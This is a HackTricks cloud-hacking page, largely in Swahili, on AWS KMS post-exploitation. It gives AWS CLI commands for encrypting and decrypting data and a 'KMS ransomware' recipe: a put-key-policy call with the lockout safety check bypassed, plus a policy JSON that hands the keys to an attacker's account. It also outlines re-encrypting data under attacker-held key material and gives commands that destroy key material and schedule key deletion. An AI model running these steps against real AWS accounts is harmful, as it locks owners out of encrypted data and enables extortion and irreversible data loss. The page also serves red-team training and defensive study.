AWS - KMS Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

KMS

Kwa maelezo zaidi angalia:

AWS - KMS Enum

Encrypt/Decrypt information

fileb:// na file:// ni mipango ya URI inayotumika katika amri za AWS CLI kubaini njia ya faili za ndani:

fileb://: Inasoma faili kwa njia ya binary, inayotumika kawaida kwa faili zisizo za maandiko.
file://: Inasoma faili kwa njia ya maandiko, inayotumika kawaida kwa faili za maandiko safi, skripti, au JSON ambayo haina mahitaji maalum ya uandishi.

Kumbuka kwamba ikiwa unataka kufungua baadhi ya data ndani ya faili, faili lazima iwe na data ya binary, si data iliyowekwa kwa base64. (fileb://)

Kutumia funguo symmetric

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

Kutumia asymmetric ufunguo:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji mwenye ufikiaji wa kipaumbele juu ya KMS anaweza kubadilisha sera ya KMS ya funguo na kutoa ufikiaji wa akaunti yake juu yao, akiondoa ufikiaji uliopewa akaunti halali.

Hivyo, watumiaji wa akaunti halali hawataweza kufikia taarifa yoyote ya huduma yoyote ambayo imekuwa imefichwa kwa kutumia funguo hizo, na kuunda ransomware rahisi lakini yenye ufanisi juu ya akaunti hiyo.

Kumbuka kwamba funguo zinazodhibitiwa na AWS hazihusiki na shambulio hili, ni funguo zinazodhibitiwa na Mteja pekee.

Pia kumbuka hitaji la kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili kwenye konso ya wavuti unafanya shambulio hili liwezekane tu kutoka CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji kwa akaunti ya nje tu, na kisha kutoka kwenye akaunti hii ya nje unajaribu kuweka sera mpya ili kurudisha ufikiaji kwa akaunti ya awali, huwezi.

Generic KMS Ransomware

Global KMS Ransomware

Kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo itahusisha hatua zifuatazo:

Unda funguo mpya na vifaa vya funguo vilivyoagizwa na mshambuliaji
Re-encrypt data za zamani zilizoshikiliwa na toleo la awali na ile mpya.
Futa funguo za KMS
Sasa ni mshambuliaji tu, ambaye ana vifaa vya funguo vya awali anaweza kufungua data iliyoshikiliwa.

Destroy keys

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

Kumbuka kwamba AWS sasa inasitisha vitendo vya awali kufanywa kutoka akaunti tofauti:

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - IAM Post Exploitation NextAWS - Lambda Post Exploitation

Last updated 3 days ago